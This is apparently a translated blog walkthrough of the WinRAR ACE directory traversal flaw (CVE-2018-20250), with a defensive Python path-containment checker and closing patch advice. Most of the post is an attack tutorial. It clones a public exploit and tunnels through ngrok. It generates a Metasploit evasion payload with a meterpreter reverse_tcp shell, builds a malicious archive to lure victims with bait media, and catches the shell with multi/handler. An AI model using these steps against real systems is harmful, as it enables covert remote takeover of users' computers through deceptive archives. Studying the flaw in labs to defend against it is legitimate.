Cause
Content from the WinRAR China download page
Nadav Grossman from Check Point Software Technologies reported a security vulnerability in the UNACEV2.DLL library. This vulnerability allows the creation of files in any folder inside or outside the target folder when decompressing ACE archives. WinRAR uses this third-party library to decompress ACE archives. UNACEV2.DLL has not been updated since 2005 and we do not have access to its source code. Therefore, we decided to abandon support for the ACE archive format to protect the security of WinRAR users.
Report source: Extracting a 19 Year Old Code Execution from WinRAR
Affected versions:
WinRAR < 5.70 Beta 1
Bandizip <= 6.2.0.0
Haozip (2345 Compression) <= 5.9.8.10907
360 Compression <= 4.0.0.1170
As soon as the vulnerability was announced, major security companies immediately began analyzing the vulnerability and malicious samples:
- Analysis of the First Malicious Sample Exploiting the WinRAR Vulnerability
- Beware! WinRAR Vulnerability Exploitation Upgrade: Social Engineering, Encryption, Fileless Backdoor
Note: When I saw that exploiting the vulnerability ends with a file being dropped into the startup folder, I knew this vulnerability had a high chance of being intercepted by the major security guards. But let's put that aside for now.
Analysis of Vulnerability Cause
As a newbie, all I can do is read the analysis of the experts and after reading enough, try to analyze it myself.
- Your WinRAR on the Computer May Have Serious Security Vulnerabilities
- Reproduction and Defense of WinRAR Directory Traversal Vulnerability
Most of the articles analyzing the vulnerability reproduce the content of the original report.
Vulnerability Reproduction
UNACEV2.dll is the dynamic link library that handles ACE-format archives. During decompression it has a directory traversal vulnerability: a member's file name can escape the chosen output folder, so a file can be written into the startup folder, resulting in code execution at the next logon.
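The check the vulnerable extractor lacked is easy to state: every member name must resolve to a location inside the chosen output folder, and an archive must be recognised as ACE by its content, not its extension. The Python below is an added example written for this post (it is not code from the page, from WinRAR, or from the UNACEV2 project): `is_ace_archive` looks for the ACE main-header signature, which the ACE format places at byte offset 7 after the 7-byte CRC/size/type/flags prefix, and `safe_member_path` applies Windows path rules to decide whether a member name stays inside the output folder. The function names, the sample archive bytes and the member names are all constructed for the example.

```python
import ntpath

# ACE archives start with a main header: hd_crc(2) hd_size(2) hd_type(1) hd_flags(2),
# followed by the signature "**ACE**" at byte offset 7. WinRAR dispatches on this
# signature rather than on the file extension, so a renamed ".rar" still reaches UNACEV2.DLL.
ACE_MAGIC = b"**ACE**"
ACE_MAGIC_OFFSET = 7


def is_ace_archive(data: bytes) -> bool:
    """True if the leading bytes of a file carry the ACE main-header signature."""
    end = ACE_MAGIC_OFFSET + len(ACE_MAGIC)
    return len(data) >= end and data[ACE_MAGIC_OFFSET:end] == ACE_MAGIC


def safe_member_path(dest_dir: str, member_name: str):
    """Resolve an archive member name under dest_dir using Windows path rules.

    Returns the absolute destination path, or None when the name would land
    outside dest_dir: an absolute path, a drive-relative path such as "C:x",
    a UNC path, or ".." traversal. This is the containment check an extractor
    must run before creating each file.
    """
    name = member_name.replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    # Any drive component (C:\x, C:x) or a leading backslash (\x, \\server\share\x)
    # means the name is not relative to the output folder: reject it outright.
    if drive or rest.startswith("\\"):
        return None
    dest_norm = ntpath.normpath(dest_dir)
    joined = ntpath.normpath(ntpath.join(dest_norm, rest))
    # normpath collapses ".." segments; compare case-insensitively like NTFS does.
    base = ntpath.normcase(dest_norm)
    cand = ntpath.normcase(joined)
    if cand != base and not cand.startswith(base + "\\"):
        return None
    return joined


def audit_members(dest_dir: str, member_names):
    """Return the member names that would escape dest_dir (empty list means clean)."""
    return [n for n in member_names if safe_member_path(dest_dir, n) is None]


if __name__ == "__main__":
    # Constructed sample: zero-filled 7-byte prefix, then the ACE signature.
    sample_ace = b"\x00" * 7 + ACE_MAGIC + b"\x00" * 16
    print("ACE archive:", is_ace_archive(sample_ace))
    out = "C:\\Users\\demo\\Downloads\\photos"
    # Constructed member list: two benign names and one that climbs out of the folder.
    names = ["IMG_0001.jpg", "album\\IMG_0002.jpg", "..\\..\\escape.txt"]
    print("Escaping members:", audit_members(out, names))
```

`ntpath` is used deliberately so the checks follow Windows semantics even when the script is run on Linux; feeding `audit_members` the member list printed by a header dump (for example the output of acefile.py) gives a quick triage of a suspicious archive without extracting it.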
Reference articles:
Environment Preparation
- Attacker machine: Kali 2019.1 with internet access
- Target machine: Win7 SP1 with internet access
Download WinRAR v5.6 from: http://www.zdfans.com/html/5737.html
I downloaded a Chinese version, it doesn't matter, as long as the version is correct:
We can see that the UNACEV2.dll file that causes the vulnerability is still there, so it's OK:
Download WinRAR Exploit
git clone https://github.com/WyAtu/CVE-2018-20250.git
If your internet connection is slow, you can use the copy I cloned to gitee:
git clone https://gitee.com/soapffz/CVE-2018-20250.git
Start ngrok tunnel
Of course, you don't need this step if you are attacking from the internal network.
- Open the website https://www.ngrok.cc, if you don't have an account, register one. Log in, Tunnel Management on the left -> Open Tunnel -> Select the free Hong Kong Ngrok server in the lower right corner:
- Set the ngrok tunnel protocol to TCP, change the internal IP to your own Kali Linux internal IP, and the internal port can be filled in arbitrarily as long as it doesn't conflict.
Then you will find that no matter what port you switch to, it will become like this:
Obviously, this is a marketing strategy, so I was fooled and spent 10 yuan to open a VIP server:
- Download the 64-bit Ngrok client to your local machine
- Start the tunnel:
./sunny clientid your_tunnel_ID
Configure payload
- Open Metasploit, select the evasion module
Generate the payload:
evasion/windows/windows_defender_exe is a new module in msf5. If your Kali version is old, install or update Metasploit first:
msfconsole
use evasion/windows/windows_defender_exe (select msf5 evasion module)
show info (display module information)
set filename WinRarPayloadTest.exe (set the name of the payload)
set payload windows/meterpreter/reverse_tcp (set the type of payload)
set lhost your_domain (set the online address, fill in the address mapped out by Ngrok, excluding the port number and protocol type)
set lport your_port (set the listening port, fill in the port mapped out by Ngrok)
run (generate payload)
The path address of the payload: /root/.msf4/local/WinRarPayload.exe
- Copy the generated exe program to the previously downloaded exp folder directory:
Modify the rar_filename and evil_filename values in exp.py:
python exp.py
will automatically generate a malicious compressed package in the root directory:
Okay, an error occurred, close Kali, go to sleep, just kidding~
The author mentioned this issue in Read.me: https://gitee.com/soapffz/CVE-2018-20250/blob/master/README.md
If your python environment variable is configured as python2, python3, etc., then find the get_right_hdr_crc function in the exp.py file and change the line of code that opens acefile.py from:
p = os.popen('py -3 acefile.py --headers %s'%(filename))
Change it to your python opening method, for example:
p = os.popen('python3 acefile.py --headers %s'%(filename))
Of course, if you can execute the py -3 command in your environment, you don't need to change it.
The malicious compressed package has been successfully generated. Now, put some photos, videos (you know what I mean) inside, and it becomes an attractive compressed package.
Copy the generated compressed file to the www directory and start an Apache2 service.
Target machine online and listening
Download and decompress this malicious compressed package on the Windows7 target machine:
You will find our malicious payload.exe in the startup directory of win7:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Start the Metasploit remote listener to handle the online request:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost Kali's_ip
set lport the_internal_port_set_when_applying_ngrok
run
- Make sure ngrok is running in the background, then restart Win7, and after a while, you will see Win7 online in Kali:
Enter the shell to operate on Win7:
You have successfully gained control of a perfect zombie, and now it's time to eat chicken!!!
Vulnerability Fix
- Upgrade to version 5.70.2.0
- Delete the UNACEV2.dll file in the installation directory
- Be careful when receiving sensitive compressed packages, don't let curiosity harm you!